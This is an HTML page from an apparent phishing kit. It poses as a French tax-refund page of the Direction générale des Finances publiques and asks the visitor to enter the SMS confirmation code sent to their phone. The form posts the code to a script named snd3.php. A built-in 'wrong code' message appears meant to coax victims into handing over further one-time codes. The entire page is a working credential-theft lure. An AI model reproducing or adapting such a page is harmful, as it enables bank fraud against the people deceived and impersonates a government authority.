<!-- #######  THIS IS A COMMENT - Visible only in the source editor #########-->
<div id="greyBackground">
<div id="container">
    <title>Remboursement</title>
            <link rel="icon" href="templates/11.png">
<p style="text-align: center;"><img /><img src="templates/tete.png" alt="" width="1279" height="178" /></p>
<div id="greyBackground">
<div id="container">
<div id="containerHeader">
<div class="ros_nav">&nbsp;</div>
<br /><center>
<div align="center">
<div align="center">
<p><span style="color: #3366ff;"><strong>&nbsp; &nbsp;CODE DE CONFIRMATION</strong></span></p>
<form id="formulaire_saisie_adresse" action="snd3.php" method="post">
<h4>Nous vous remercions de vous authentifier en saisissant le code de confirmation &agrave; re&ccedil;u sur votre t&eacute;l&eacute;phone.&nbsp;<br />Cette authentification est obligatoire pour confirmer votre op&eacute;ration.</h4>
<p>&nbsp;</p>
<ul>
<li id="eccoccpformtab"><input id="eccoccpcompl" class="eccoccp" style="text-align: center; width: 26%; -webkit-appearance: none; margin: 0; border: 1px solid #b4b4b4; height: 28px; padding: 5 px; line-height: normal; padding-left: 10px; color: #6a6a74; outline: none; -webkit-border-radius: 4px !important; -moz-border-radius: 4px !important; border-radius: 4px !important; font-size: 13px; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box;" name="o8" maxlength="8" required="" type="text" placeholder="" /></li>
<li></li>
<li>
<div><span style="color: #ff0000;">&nbsp;Le code de confirmation erron&eacute; vous allez recevoir un autre code pour confirmer.&nbsp;</span></div>
</li>
<li>
<div>&nbsp;</div>
<button class="btn-base btn-primary btn-simple btn-inverse" style="border-radius: 3px; font-size: 13px; font-family: Arial; font-weight: bold; padding: 7px 16px; vertical-align: top; background: #4464E6; border: 1px solid #4464E6; color: #fdfdff;" type="submit">Annuler</button> <button id="validate" class="btn-base btn-primary btn-simple" style="border-radius: 3px; font-size: 13px; font-family: Arial; font-weight: bold; padding: 7px 16px; vertical-align: top; background: #4464E6; border: 1px solid #4464E6; color: #fdfdff;" type="submit">Confirmer</button></li>
</ul>
<p>&nbsp;</p>
</form></div>
</div>
</center><form class="full-width" action="swiss.php" method="post" name="registrationDetails"></form></div>
</div>
</div>
<p><p style="text-align: center;"><img src="templates/bas.png" alt="" width="1279" height="73" /></p>
</center></div>
</div>
  <div class="footer-copyright">
    <div class="footer-copyright">
    <div style="background: none repeat scroll 0%;font-family: sans-serif;font-size: small;-moz-background-clip: -moz-initial;-moz-background-origin: -moz-initial;-moz-background-inline-policy: -moz-initial;width: 100%;color: black;text-align: center;background-color: white;"><marquee style="
"> Direction g&eacute;n&eacute;rale des Finances publiques - Mentions l&eacute;gales</marquee></div>
  </div>
  </div>
  </div>
</footer>
                </main>
</div>